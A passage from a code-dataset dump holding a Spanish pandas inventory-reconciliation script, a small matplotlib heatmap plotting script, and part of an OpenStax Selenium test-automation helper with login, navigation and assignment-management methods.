= pd.merge(dff3p3, f3, left_on=['f3','upc'], right_on=['nro devolucion','upc']) # Unir b2345 con F3\nbdf3cant2, ndc, cdc = ica.get_diffqty(bdf3cant, 'unidades', 'cantidad', 'F3')\nbdf3cant3, nanu, canu = ica.get_canceledstatus(bdf3cant2, 'descripcion.6', 'F3') # TODO cambiar por get_equalvalue()\n\n# TODO revisar porque no funciona \nbdf3conf = bdf3cant3[bdf3cant3['descripcion.6']=='Confirmado']\nbdf3conf2, ndy, cdy = ica.get_diffyear(bdf3conf, 'aaaa anulacion', '2021', 'F3')\n\niokf3 = bdf3cant3[index_name].values\nbd = ica.get_db()\nbd.loc[iokf3, 'CIF3'] = 'OKK'\nbd.loc[iokf3, 'CIA'] = 'OKK'\n\nprint('\\n ----------------- Base 2345 ----------------- ')\nprint('\\n ## Resumen de información según estatus final')\nprint(bd[['estatus final', cost_column]].groupby('estatus final').sum().sort_values(by=cost_column, ascending=False))\nprint('\\n--------------------------------------------------------------------')\nprint('## Análisis con F3 proveedor')\nprint('--------------------------------------------------------------------')\nprint('# Resumen: ')\nprint(f'= {nfnan+ndu+nne+ndc+nanu+ndy} de {nf3p} registros con novedad, por un valor de: {cfnan+cdu+cne+cdc+canu+cdy:,.2f}')\nprint('# Detalle: ')\nprint(f'- {nfnan} de {nf3p} registros cerrados sin número de F3, por un valor de {cfnan:,.2f}')\nprint(f'- {ndu} de {dff3p2.shape[0]} registros duplicados, por un valor de {cdu:,.2f}')\nprint(f'- {nne} de {dff3p3.shape[0]} registros no se encontraron en la base de F3, por un valor de {cne:,.2f}')\nprint(f'- {ndc} de {bdf3cant.shape[0]} registros no coinciden con cantidad de la base de F3, por un valor de {cdc:,.2f}')\nprint(f'- {nanu} de {bdf3cant2.shape[0]} registros anulados en la base de F3, por un valor de {canu:,.2f}')\nprint(f'- {ndy} de {bdf3cant3.shape[0]} registros no coindicen con el año de confirmación 2021, por un valor de {cdy:,.2f}')\nprint(bd[[cost_column, 'CIF3', 'estatus final']].groupby(['estatus final', 'CIF3']).sum().sort_values(by=cost_column, ascending=False))\nprint('--------------------------------------------------------------------')\n\n# Análisis de F4 \nbdcf4 = bd[(bd['tpificacion'] == 'CERRADO ')]\ndff4 = bdcf4[(bdcf4['estatus final']=='Dado de baja por entregado a cliente -(Autoriza Gerencia de Control Operacional)') \n | (bdcf4['estatus final']=='Dado de baja por F12 entregado en tienda antes de inventario (Autoriza Gerencia de Control Operacional) ') \n | (bdcf4['estatus final']=='Dado de baja por error en la generación de la NC - Autoriza Gerencia de Control Operacional) ') \n | (bdcf4['estatus final']=='Cierre x F4 Cobrado a terceros')]\n\nnf4 = dff4.shape[0]\ncf4 = dff4[cost_column].sum()\n\ndff42, nfnanf4, cfnanf4 = ica.get_fnan( dff4, 'f4', 'F4')\ndff43, nduf4, cduf4 = ica.get_duplicates( dff42, ['f4', 'upc'], 'F4')\nnef4, nnef4, cnef4 = ica.get_notfound( dff43, f4, ['f4', 'upc'], ['nro. red. inventario', 'upc'], 'nro. red. inventario', 'F4')\nbdf4cant = pd.merge(dff43, f4, left_on=['f4','upc'], right_on=['nro. red. inventario','upc']) # Unir b2345 con F4\nbdf4cant2, ndcf4, cdcf4 = ica.get_diffqty(bdf4cant, 'unidades', 'cantidad', 'F4')\nbdf4cant3, nanuf4, canuf4 = ica.get_canceledstatus(bdf4cant2, 'estado', 'F4')\nbdf4dy, ndyf4, cdyf4 = ica.get_diffyear(bdf4cant3, 'aaaa creacion', '2021', 'F4')\n\niokf4 = bdf4dy[index_name].values\nbd = ica.get_db()\nbd.loc[iokf4, 'CIF4'] = 'OKK'\nbd.loc[iokf4, 'CIA'] = 'OKK'\n\nprint('## Análisis con F4 ')\nprint('--------------------------------------------------------------------')\nprint('# Resumen: ')\nprint(f'= {nfnanf4+nduf4+nnef4+ndcf4+nanuf4} de {nf4} registros con novedad, por un valor de: {cfnanf4+cduf4+cnef4+cdcf4+canu:,.2f}')\nprint('# Detalle: ')\nprint(f'- {nfnanf4} de {nf4} registros cerrados sin número de F4, por un valor de {cfnanf4:,.2f}')\nprint(f'- {nduf4} de {dff42.shape[0]} registros duplicados, por un valor de {cduf4:,.2f}')\nprint(f'- {nnef4} de {dff43.shape[0]} registros no se encontraron en la base de F4, por un valor de {cnef4:,.2f}')\nprint(f'- {ndcf4} de {bdf4cant.shape[0]} registros no coinciden con cantidad de la base de F4, por un valor de {cdcf4:,.2f}')\nprint(f'- {nanuf4} de {bdf4cant2.shape[0]} registros anulados en la base de F4, por un valor de {canuf4:,.2f}')\nprint(f'- {ndyf4} de {bdf4cant3.shape[0]} registros no coindicen con el año de confirmación 2021, por un valor de {cdyf4:,.2f}')\nprint(bd[[cost_column, 'CIF4', 'estatus final']].groupby(['estatus final', 'CIF4']).sum().sort_values(by=cost_column, ascending=False))\nprint('--------------------------------------------------------------------')\n\n# Análisis de KPI\ndfkpi = bd[(bd['estatus final']=='Recibido en CD') & (bd['tpificacion']=='CERRADO ')]\nnkpi = dfkpi.shape[0]\nckpi = dfkpi[cost_column].sum()\n\ndfkpi2, nfnankpi, cfnankpi = ica.get_fnan( dfkpi, 'nro_f12', 'KPI')\ndfkpi3, ndukpi, cdukpi = ica.get_duplicates( dfkpi2, ['nro_f12', 'upc', 'unidades'], 'KPI')\nnekpi, nnekpi, cnekpi = ica.get_notfound( dfkpi3, kpi, ['nro_f12'], ['entrada'], 'entrada', 'KPI')\nbdkpi_year = pd.merge(dfkpi3, kpi, left_on=['nro_f12'], right_on=['entrada']) # Unir b2345 con KPI\nbdkpi_year2, ndykpi, cdykpi = ica.get_diffyear(bdkpi_year, 'aaaa paletiza', '2021', 'KPI')\n\niok_kpi = bdkpi_year2[index_name].values\nbd = ica.get_db()\nbd.loc[iok_kpi, 'CIKPI'] = 'OKK'\nbd.loc[iok_kpi, 'CIA'] = 'OKK'\n\nprint('## Análisis con KPI ')\nprint('--------------------------------------------------------------------')\nprint('# Resumen: ')\nprint(f'= {nfnankpi+ndukpi+nnekpi+ndykpi} de {nkpi} registros con novedad, por un valor de: {cfnankpi+cdukpi+cnekpi+cdykpi:,.2f}')\nprint('# Detalle: ')\nprint(f'- {nfnankpi} de {nkpi} registros cerrados sin número de F12, por un valor de {cfnankpi:,.2f}')\nprint(f'- {ndukpi} de {dfkpi2.shape[0]} registros duplicados, por un valor de {cdukpi:,.2f}')\nprint(f'- {nnekpi} de {dfkpi3.shape[0]} registros no se encontraron en la base de KPI, por un valor de {cnekpi:,.2f}')\nprint(f'- {ndykpi} de {bdkpi_year.shape[0]} registros no coindicen con el año paletiza 2021, por un valor de {cdykpi:,.2f}')\nprint('--------------------------------------------------------------------') \n\ntip = bd[bd['tpificacion']=='Cerrado']\ngbd = bd[['nef', 'CIA',cost_column]].groupby(['nef','CIA']).agg({'sum','size'}).reset_index()\ngbd.columns = gbd.columns.to_flat_index()\ngbd.columns = [\"_\".join(a) for a in gbd.columns.to_flat_index()]\ngbd.loc[gbd['nef_'] == 'Con F3 Proveedor', 'percentage'] = gbd.loc[gbd['nef_'] == 'Con F3 Proveedor', 'total_sum']/cf3p\ngbd.loc[gbd['nef_'] == 'F4s', 'percentage'] = gbd.loc[gbd['nef_'] == 'F4s', 'total_sum'] / cf4\ngbd.loc[gbd['nef_'] == 'Recibido en CD', 'percentage'] = gbd.loc[gbd['nef_'] == 'Recibido en CD', 'total_sum'] / ckpi\ngbd.to_csv(f'output/{dt_string}-gbd.csv', sep=';', decimal=',', index=False)\n\n# Tareas finales \nbd = ica.get_db()\nbd.to_csv(f'output/{dt_string}-bd.csv', sep=';', decimal=',', index=False) # Guarda el archivo \nbdtotal = bd.merge(f3, how='left', left_on=['f3','upc'], right_on=['nro devolucion','upc'],indicator='F3_merge')\nbdtotal = bdtotal.merge(f4, how='left', left_on=['f4','upc'], right_on=['nro. red. inventario','upc'], indicator='F4_merge')\nbdtotal = bdtotal.merge(kpi, how='left', left_on='nro_f12', right_on='entrada', indicator='KPI_merge')\nbdtotal.drop_duplicates(subset=['indice_b25'], inplace=True)\nbdtotal.to_csv(f'output/{dt_string}-bdtotal.csv', sep=';', decimal=',', index=False)\n#kpi.to_csv(f'output/{dt_string}-kpi.csv', sep=';', decimal=',', index=False)","repo_name":"twofortyone/green","sub_path":"archive/tm_b2345.py","file_name":"tm_b2345.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14813237421","text":"import numpy as np\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\n\n\n######\nplt.rcParams[\"mathtext.fontset\"] = \"cm\" # Fonte matemática pro latex\nplt.rc('font', family='serif') # fonte tipo serif, p fica paredico com latex msm\nplt.rc('text', usetex=False) # esse vc deixa True e for salvar em pdf e False se for p salvar png\n######\nfig, ax = plt.subplots()\nfig.set_size_inches(7*0.393, 7*0.393) # o valor multiplicando é o tamanho em cm\n\n\n\nfiles = os.listdir(\"data/\")\n\nfor f in files:\n data = np.loadtxt(\"data/\" + f)\n ax.pcolormesh(data,cmap = \"plasma\", vmax=1)\n plt.savefig(\"plots/\" + f[:-4] + \".png\",bbox_inches='tight',dpi = 300) # salva em png\n ax.cla()\n\nplt.close()","repo_name":"Farinha96br/git_douts","sub_path":"Testes/heat/plot_sample.py","file_name":"plot_sample.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15114614350","text":"\"\"\"OpenStax Python helper for common actions.\"\"\"\n\nimport calendar\nimport datetime\nimport inspect\nimport os\nimport re\n\nfrom autochomsky import chomsky\nfrom builtins import FileNotFoundError\nfrom datetime import timedelta\nfrom itertools import repeat\nfrom random import randint\nfrom requests import HTTPError\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.chrome import options, service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support import expected_conditions as expect\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\nfrom time import sleep\nfrom urllib.parse import urlparse, ParseResult\n\ntry:\n from staxing.assignment import Assignment\nexcept ImportError: # pragma: no cover\n from assignment import Assignment\ntry:\n from staxing.page_load import SeleniumWait as Page\nexcept ImportError: # pragma: no cover\n from page_load import SeleniumWait as Page\n\n__version__ = '0.0.43'\n\n\nclass Helper(object):\n \"\"\"Primary parent control class.\"\"\"\n\n CONDENSED_WIDTH = 767 # pixels wide\n DEFAULT_WAIT_TIME = 15 # seconds\n CAPABILITIES = {\n 'android': DesiredCapabilities.ANDROID,\n 'chrome': DesiredCapabilities.CHROME,\n 'firefox': DesiredCapabilities.FIREFOX,\n 'headlesschrome': DesiredCapabilities.CHROME,\n 'htmlunit': DesiredCapabilities.HTMLUNIT,\n 'htmlunitwithjs': DesiredCapabilities.HTMLUNITWITHJS,\n 'internetexplorer': DesiredCapabilities.INTERNETEXPLORER,\n 'ipad': DesiredCapabilities.IPAD,\n 'iphone': DesiredCapabilities.IPHONE,\n 'microsoftedge': DesiredCapabilities.EDGE,\n 'opera': DesiredCapabilities.OPERA,\n 'safari': DesiredCapabilities.SAFARI,\n }\n\n def __init__(self,\n driver_type='chrome',\n capabilities=None,\n pasta_user=None,\n wait_time=DEFAULT_WAIT_TIME,\n remote_driver='',\n existing_driver=None,\n **kwargs):\n \"\"\"Class constructor.\"\"\"\n if driver_type == 'saucelabs' and pasta_user is None:\n raise TypeError('A Sauce Labs user is required for remote testing')\n self.pasta = pasta_user\n self.remote_driver = remote_driver\n self.driver_type = driver_type.lower()\n if existing_driver:\n self.driver = existing_driver\n else:\n driver = driver_type if not pasta_user else 'saucelabs'\n self.driver = self.run_on(\n driver_type=driver,\n pasta_user=self.pasta,\n capabilities=capabilities)\n self.driver.implicitly_wait(wait_time)\n self.wait = WebDriverWait(self.driver, wait_time)\n self.wait_time = wait_time\n self.page = Page(self.driver, self.wait_time)\n super(Helper, self).__init__()\n\n def __enter__(self):\n \"\"\"Entry point.\"\"\"\n return self\n\n def __del__(self):\n \"\"\"Class destructor.\"\"\"\n self.delete()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"Class exitor.\"\"\"\n self.delete()\n\n def delete(self):\n \"\"\"Webdriver destructor.\"\"\"\n self.wait = None\n try:\n self.driver.quit()\n except Exception:\n pass\n\n @classmethod\n def default_capabilities(cls, browser='chrome'):\n \"\"\"Return the default browser capabilities.\"\"\"\n browser = browser.lower()\n browser = ''.join(browser.split())\n return Helper.CAPABILITIES[browser].copy()\n\n def run_on(self, driver_type, pasta_user=None, capabilities={}):\n \"\"\"Webdriver activation.\n\n driver_type (string): web browser type\n pasta_user (PastaSauce): optional API access for saucelabs\n capabilities (dict): browser settings; copy object to avoid overwrite\n Defaults:\n DesiredCapabilities.ANDROID.copy()\n DesiredCapabilities.CHROME.copy()\n DesiredCapabilities.EDGE.copy()\n DesiredCapabilities.FIREFOX.copy()\n DesiredCapabilities.HTMLUNIT.copy()\n DesiredCapabilities.HTMLUNITWITHJS.copy()\n DesiredCapabilities.INTERNETEXPLORER.copy()\n DesiredCapabilities.IPAD.copy()\n DesiredCapabilities.IPHONE.copy()\n DesiredCapabilities.ORERA.copy()\n DesiredCapabilities.SAFARI.copy()\n Keys:\n platform\n browserName\n version\n javascriptEnabled\n wait (int): standard time, in seconds, to wait for Selenium commands\n opera_driver (string): Chromium location\n \"\"\"\n if pasta_user:\n driver = 'saucelabs'\n elif driver_type and 'chrome' not in driver_type:\n driver = driver_type\n else:\n option_set = options.Options()\n option_set.add_argument('disable-infobars')\n option_set.add_argument('disable-geolocation')\n option_set.add_experimental_option(\n 'prefs', {\n 'credentials_enable_service': False,\n 'profile': {\n 'password_manager_enabled': False\n }\n }\n )\n if 'headless' in driver_type:\n option_set.add_argument('headless')\n driver = 'headlesschrome'\n else:\n driver = 'chrome'\n try:\n return {\n 'firefox': lambda: webdriver.Firefox(),\n 'chrome': lambda: webdriver.Chrome(\n chrome_options=option_set),\n 'headlesschrome': lambda: webdriver.Chrome(\n chrome_options=option_set),\n 'ie': lambda: webdriver.Ie(),\n 'opera': lambda: self.start_opera(self.opera_driver),\n 'safari': lambda: webdriver.Safari(),\n 'saucelabs': lambda: webdriver.Remote(\n command_executor=(\n 'http://%s:%s@ondemand.saucelabs.com:80/wd/hub' %\n (pasta_user.get_user(), pasta_user.get_access_key())),\n desired_capabilities=capabilities),\n }[driver]()\n except WebDriverException as err:\n raise FileNotFoundError(err)\n except Exception as err:\n raise err\n\n def start_opera(self, location):\n \"\"\"Opera initiator.\"\"\"\n webdriver_service = service.Service(location)\n webdriver_service.start()\n return webdriver.Remote(\n webdriver_service.service_url,\n DesiredCapabilities.OPERA.copy()\n )\n\n def change_wait_time(self, new_wait):\n \"\"\"Change the max action wait time.\"\"\"\n if new_wait <= 0:\n raise ValueError('Wait time must be greater than zero (0).')\n self.driver.implicitly_wait(new_wait)\n self.wait = WebDriverWait(self.driver, new_wait)\n self.wait_time = new_wait\n\n def date_string(self, day_delta=0, str_format='%m/%d/%Y'):\n \"\"\"System date format pass-through.\"\"\"\n return Assignment().to_date_string(day_delta, str_format)\n\n def get(self, url):\n \"\"\"Return the current URL.\"\"\"\n self.driver.get(url)\n self.page.wait_for_page_load()\n\n def get_window_size(self, dimension=None):\n \"\"\"Return the current window dimensions.\"\"\"\n get_size = self.driver.get_window_size()\n if not dimension:\n return get_size\n if dimension not in get_size:\n raise IndexError('Unknown dimension: %s' % dimension)\n return get_size[dimension]\n\n def set_window_size(self, width=0, height=0, maximize=False):\n \"\"\"Attempt to change the browser window size.\"\"\"\n if maximize:\n self.driver.maximize_window()\n elif width >= 1 and height >= 1:\n self.driver.set_window_size(width, height)\n sleep(1.0)\n return self.get_window_size()\n\n def set_window_position(self, x_=0, y_=0):\n \"\"\"Move the browser window anchor.\"\"\"\n if x_ >= 0 and y_ >= 0:\n self.driver.set_window_position(x_, y_)\n sleep(1.0)\n\n def sleep(self, seconds=1.0):\n \"\"\"Stop execution for the specified time in seconds.\"\"\"\n sleep(seconds)\n\n def find(self, by, value):\n \"\"\"Find element.\"\"\"\n return self.driver.find_element(by=by, value=value)\n\n def find_all(self, by, value):\n \"\"\"Find elements.\"\"\"\n return self.driver.find_elements(by=by, value=value)\n\n def scroll_to(self, target):\n \"\"\"Scroll the browser window to bring the target into view.\"\"\"\n Assignment.scroll_to(self.driver, target)\n return target\n\n def url_parse(self, site):\n \"\"\"Parse the url into a valid url.\"\"\"\n parse = list(\n urlparse(\n site if urlparse(site).scheme\n else '%s%s' % ('//', site)\n )\n )\n parse[0] = b'https'\n for index, value in enumerate(parse):\n parse[index] = value.decode('utf-8') if isinstance(value, bytes) \\\n else value\n parse = ParseResult(*parse)\n return parse.geturl()\n\n\nclass User(Helper):\n \"\"\"User parent class.\"\"\"\n\n CONDENSED_WIDTH = Helper.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = Helper.DEFAULT_WAIT_TIME\n\n def __init__(self,\n username,\n password,\n site='https://tutor-qa.openstax.org',\n email=None,\n email_username=None,\n email_password=None,\n driver_type='chrome',\n capabilities=None,\n pasta_user=None,\n wait_time=DEFAULT_WAIT_TIME,\n opera_driver='',\n existing_driver=None,\n **kwargs):\n \"\"\"\n Base user constructor.\n\n username (string): website username\n password (string): website password\n site (string): website URL\n driver_type (string): web browser type\n pasta_user (PastaSauce): optional API access for saucelabs\n capabilities (dict): browser settings; copy object to avoid overwrite\n Defaults:\n DesiredCapabilities.ANDROID.copy()\n DesiredCapabilities.CHROME.copy()\n DesiredCapabilities.EDGE.copy()\n DesiredCapabilities.FIREFOX.copy()\n DesiredCapabilities.HTMLUNIT.copy()\n DesiredCapabilities.HTMLUNITWITHJS.copy()\n DesiredCapabilities.INTERNETEXPLORER.copy()\n DesiredCapabilities.IPAD.copy()\n DesiredCapabilities.IPHONE.copy()\n DesiredCapabilities.ORERA.copy()\n DesiredCapabilities.PHANTOMJS.copy()\n DesiredCapabilities.SAFARI.copy()\n Keys:\n platform\n browserName\n version\n javascriptEnabled\n wait (int): standard time, in seconds, to wait for Selenium commands\n opera_driver (string): Chromium location\n \"\"\"\n self.username = username\n self.password = password\n self.url = self.url_parse(site)\n self.email = email\n self.email_username = email_username\n self.email_password = email_password\n self.assign = Assignment()\n self.course_dates = (None, None)\n super(User, self).__init__(driver_type=driver_type,\n capabilities=capabilities,\n pasta_user=pasta_user,\n wait_time=wait_time,\n opera_driver=opera_driver,\n existing_driver=existing_driver,\n **kwargs)\n\n def accept_contract(self):\n \"\"\"Contract acceptance for Terms of Service and the Privacy Policy.\"\"\"\n checkbox_id = 'agreement_i_agree' if 'accounts' in \\\n self.current_url() else 'i_agree'\n try:\n target = self.find(By.ID, checkbox_id)\n self.scroll_to(target)\n target.click()\n target = self.find(By.ID, 'agreement_submit')\n self.scroll_to(target)\n target.click()\n except Exception as e:\n raise e\n\n def login(self, url=None, username=None, password=None):\n \"\"\"Tutor login control.\n\n If parameters are not passed, log in using the class values.\n Branching to deal with standard or compact screen widths\n\n username (string): website username\n password (string): website password\n url (string): website URL\n \"\"\"\n username = self.username if not username else username\n password = self.password if not password else password\n url_address = self.url if not url else self.url_parse(url)\n # open the URL\n self.get(url_address)\n if 'tutor' in url_address:\n login = self.wait.until(\n expect.presence_of_element_located(\n (By.CSS_SELECTOR, '.login')\n )\n )\n self.scroll_to(login)\n login.click()\n self.page.wait_for_page_load()\n elif 'exercises' in url_address:\n self.find(By.LINK_TEXT, 'Sign in').click()\n self.page.wait_for_page_load()\n src = self.driver.page_source\n text_located = re.search(r'openstax', src.lower())\n self.sleep(1)\n if not text_located:\n raise LoginError('Non-OpenStax URL: %s' % self.driver.current_url)\n # enter the username and password\n self.find(By.ID, 'login_username_or_email').send_keys(username)\n self.find(By.CSS_SELECTOR, '.primary').click()\n self.find(By.ID, 'login_password').send_keys(password)\n self.find(By.CSS_SELECTOR, '.primary').click()\n self.page.wait_for_page_load()\n # check if a password change is required\n if 'reset your password' in self.driver.page_source.lower():\n try:\n self.find(By.ID, 'set_password_password') \\\n .send_keys(self.password)\n self.find(By.ID, 'set_password_password_confirmation') \\\n .send_keys(self.password)\n self.find(By.CSS_SELECTOR, '.primary').click()\n self.sleep(1)\n self.find(By.CSS_SELECTOR, '.primary').click()\n except Exception as e:\n raise e\n self.page.wait_for_page_load()\n source = self.driver.page_source.lower()\n while 'terms of use' in source or 'privacy policy' in source:\n self.accept_contract()\n self.page.wait_for_page_load()\n source = self.driver.page_source.lower()\n return self\n\n def logout(self):\n \"\"\"Logout control.\"\"\"\n url_address = self.current_url()\n if 'tutor' in url_address:\n self.tutor_logout()\n elif 'accounts' in url_address:\n self.accounts_logout()\n elif 'exercises' in url_address:\n self.exercises_logout()\n else:\n raise HTTPError('Not an OpenStax URL')\n\n def current_url(self):\n \"\"\"Return the current browser URL.\"\"\"\n return self.driver.current_url\n\n def goto_course_list(self):\n \"\"\"Go to the course picker.\"\"\"\n long_wait = WebDriverWait(self.driver, 30)\n try:\n long_wait.until(\n expect.presence_of_element_located(\n (By.ID, 'ox-react-root-container')\n )\n )\n if 'tutor' in self.current_url():\n self.find(By.CSS_SELECTOR, '.ui-brand-logo').click()\n self.page.wait_for_page_load()\n else:\n raise HTTPError('Not currently on an OpenStax Tutor webpage:' +\n ' %s' % self.current_url())\n except Exception as ex:\n raise ex\n\n def get_course_list(self, closed=False):\n \"\"\"Return a list of available courses.\"\"\"\n self.wait.until(\n expect.visibility_of_element_located(\n (By.TAG_NAME, 'h1')\n )\n )\n courses = self.find_all(\n By.CSS_SELECTOR,\n '.my-courses-current-section .my-courses-item'\n )\n if len(courses) == 0:\n print('No courses found')\n return []\n for position, course in enumerate(courses):\n print('%s : \"%s\"' % (position, course.get_attribute('data-title')))\n return courses\n\n def open_action_menu(self):\n \"\"\"Course action menu opener.\"\"\"\n self.wait.until(\n expect.visibility_of_element_located(\n (By.ID, 'actions-menu')\n )\n ).click()\n\n def open_user_menu(self):\n \"\"\"Hamburger (user) menu opener.\"\"\"\n self.wait.until(\n expect.visibility_of_element_located(\n (By.ID, 'user-menu')\n )\n ).click()\n\n def goto_menu_item(self, item):\n \"\"\"Go to a specific user menu item.\"\"\"\n if item.lower() == 'my account' or item.lower() == 'log out':\n self.open_user_menu()\n else:\n self.open_action_menu()\n print('Select menu item %s' % item)\n self.wait.until(\n expect.element_to_be_clickable(\n (By.LINK_TEXT, item)\n )\n ).click()\n self.page.wait_for_page_load()\n\n def tutor_logout(self):\n \"\"\"Tutor logout helper.\"\"\"\n self.open_user_menu()\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CSS_SELECTOR, 'input[type=submit]')\n )\n ).click()\n self.page.wait_for_page_load()\n\n def accounts_logout(self):\n \"\"\"OS Accounts logout helper.\"\"\"\n self.find(By.CSS_SELECTOR, '.sign-out').click()\n self.page.wait_for_page_load()\n\n def execises_logout(self):\n \"\"\"Exercises logout helper.\"\"\"\n wait = WebDriverWait(self.driver, 3)\n try:\n wait.until(\n expect.element_to_be_clickable(\n (By.ID, 'navbar-dropdown')\n )\n ).click()\n wait.until(\n expect.element_to_be_clickable(\n (By.CSS_SELECTOR, '[type=\"submit\"]')\n )\n ).click()\n self.page.wait_for_page_load()\n except NoSuchElementException:\n # Different page, but uses the same logic and link text\n self.find(By.CSS_SELECTOR, '[data-method]').click()\n\n def is_modal_present(self, by, value):\n try:\n self.find(by, value)\n except Exception:\n return False\n return True\n\n def close_beta_windows(self):\n \"\"\"Close the beta windows if it shows.\"\"\"\n store_wait = self.wait_time\n self.change_wait_time(1)\n while self.is_modal_present(By.CLASS_NAME,\n 'joyride-tooltip__button--primary'):\n self.sleep(0.5)\n self.find(By.CLASS_NAME, 'joyride-tooltip__button--primary') \\\n .click()\n try:\n self.find(By.XPATH, '//button[span[text()=\"Submit\"]]')\n except Exception:\n pass\n try:\n self.find(By.CSS_SELECTOR, '.onboarding-nag')\n responses = self.find_all(By.CSS_SELECTOR, '.footer .btn')\n responses[randint(0, len(responses) - 1)].click()\n self.find(By.CSS_SELECTOR, '.footer.got-it button').click()\n except Exception:\n # onboarding nag isn't shown\n pass\n # reset wait time\n self.change_wait_time(store_wait)\n\n def select_course(self, title=None, appearance=None):\n \"\"\"Select course.\"\"\"\n print('Select course \"%s\" / \"%s\"' % (title, appearance))\n if 'dashboard' not in self.current_url():\n # If not at the dashboard, try to load it\n self.goto_course_list()\n if 'dashboard' not in self.current_url():\n # Only has one course and the user is at the dashboard so return\n print('Single course; select course complete')\n return\n if appearance:\n if 'sociology' in appearance.lower():\n appearance = 'intro_sociology'\n elif 'biology' in appearance.lower():\n appearance = 'college_biology'\n else:\n appearance = 'college_physics'\n if title:\n uses_option = 'title'\n course = title\n elif appearance:\n uses_option = 'appearance'\n course = appearance\n else:\n raise LoginError('Unknown course selection \"%s\"' %\n title if title else appearance, None)\n select = self.wait.until(\n expect.element_to_be_clickable(\n (\n By.XPATH,\n '//div[@data-%s=\"%s\"]//a' % (uses_option, course)\n )\n )\n )\n print('Course: %s - %s' % (title if title else appearance,\n select.get_attribute('href')))\n self.close_beta_windows()\n select.click()\n self.page.wait_for_page_load()\n self.close_beta_windows()\n # agree the terms of use\n try:\n old_wait = self.wait_time\n self.change_wait_time(1.5)\n self.find(By.CLASS_NAME, 'btn-primary').click()\n except Exception:\n pass\n finally:\n if old_wait != self.wait_time:\n self.change_wait_time(old_wait)\n return self\n\n def view_reference_book(self):\n \"\"\"Access the reference book.\"\"\"\n try:\n # try the calendar button\n self.find(\n By.CSS_SELECTOR,\n '.calendar-header .view-reference-guide') \\\n .click()\n return\n except Exception:\n pass\n # try the user menu link\n self.goto_menu_item('Browse the Book')\n\n\nclass Teacher(User):\n \"\"\"User extention for teachers.\"\"\"\n\n CONDENSED_WIDTH = User.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n def __init__(self,\n use_env_vars=False,\n existing_driver=None,\n driver_type='chrome',\n **kwargs):\n \"\"\"Teacher initialization with User pass-through.\"\"\"\n if use_env_vars:\n if not kwargs:\n kwargs = {}\n kwargs['username'] = os.getenv('TEACHER_USER')\n kwargs['password'] = os.getenv('TEACHER_PASSWORD')\n kwargs['site'] = os.getenv('SERVER_URL')\n kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n super(Teacher, self).__init__(existing_driver=existing_driver,\n driver_type=driver_type,\n **kwargs)\n\n def switch_user(self, username):\n \"\"\"Switch username during chained actions.\"\"\"\n self.username = username\n return self\n\n def add_assignment(self, assignment, args):\n \"\"\"Add an assignment.\"\"\"\n print('Assignment: %s' % args['title'])\n self.goto_calendar()\n self.assign.open_assignment_menu(self.driver)\n self.assign.add[assignment](\n driver=self.driver,\n name=args['title'],\n description=args['description'] if 'description' in args else '',\n periods=args['periods'],\n state=args['status'],\n url=args['url'] if 'url' in args else None,\n reading_list=args['reading_list'] if 'reading_list' in args\n else None,\n problems=args['problems'] if 'problems' in args else None,\n feedback=args['feedback'] if 'feedback' in args else None\n )\n\n def change_assignment(self, assignment, args):\n \"\"\"Alter an existing assignment.\"\"\"\n print('Assignment: %s' % args['title'])\n self.goto_calendar()\n self.assign.edit[assignment](\n driver=self.driver,\n name=args['title'],\n description=args['description'],\n periods=args['periods'],\n state=args['status'],\n url=args['url'] if 'url' in args else None,\n reading_list=args['reading_list'] if 'reading_list' in args else\n None,\n problems=args['problems'] if 'problems' in args else None,\n feedback=args['feedback'] if 'feedback' in args else None,\n )\n\n def delete_assignment(self, assignment, args):\n \"\"\"Delete an existing assignment (if available).\"\"\"\n print('Assignment: %s' % args['title'])\n self.goto_calendar()\n self.assign.remove[assignment](\n driver=self.driver,\n name=args['title'],\n description=args['description'] if 'description' in args else None,\n periods=args['periods'] if 'periods' in args else None,\n state=args['status'] if 'status' in args else None,\n url=args['url'] if 'url' in args else None,\n reading_list=args['reading_list'] if 'reading_list' in args else\n None,\n problems=args['problems'] if 'problems' in args else None,\n feedback=args['feedback'] if 'feedback' in args else None,\n )\n\n def goto_calendar(self):\n \"\"\"Return the teacher to the calendar dashboard.\"\"\"\n if not self.current_url().endswith('/t'):\n self.goto_menu_item('Dashboard')\n self.page.wait_for_page_load()\n\n def goto_performance_forecast(self):\n \"\"\"Access the performance forecast page.\"\"\"\n self.goto_menu_item('Performance Forecast')\n timer = 0\n while timer < 10:\n try:\n print('Wait for forecast load try %s of 10' % (timer + 1))\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CLASS_NAME, 'guide-container')\n )\n )\n timer = 10\n except Exception:\n timer = timer + 1\n\n def goto_student_scores(self):\n \"\"\"Access the student scores page.\"\"\"\n self.goto_menu_item('Student Scores')\n\n def goto_course_roster(self):\n \"\"\"Access the course roster page.\"\"\"\n self.goto_menu_item('Course Roster')\n\n def goto_course_settings(self):\n \"\"\"Access the course settings page.\"\"\"\n self.goto_menu_item('Course Settings')\n\n def get_course_sections(self):\n \"\"\"Return the list of course sections currently active.\"\"\"\n if 'roster' not in self.current_url():\n self.goto_course_roster()\n try:\n self.find(By.CSS_SELECTOR, '.no-periods-message')\n return []\n except Exception:\n pass\n tabs = self.find_all(By.CSS_SELECTOR, '.nav-tabs h2')\n return [tab.get_attribute('innerHTML') for tab in tabs]\n\n def add_course_section(self, section_name):\n \"\"\"Add a section to the course.\"\"\"\n if 'roster' not in self.current_url():\n self.goto_course_roster()\n 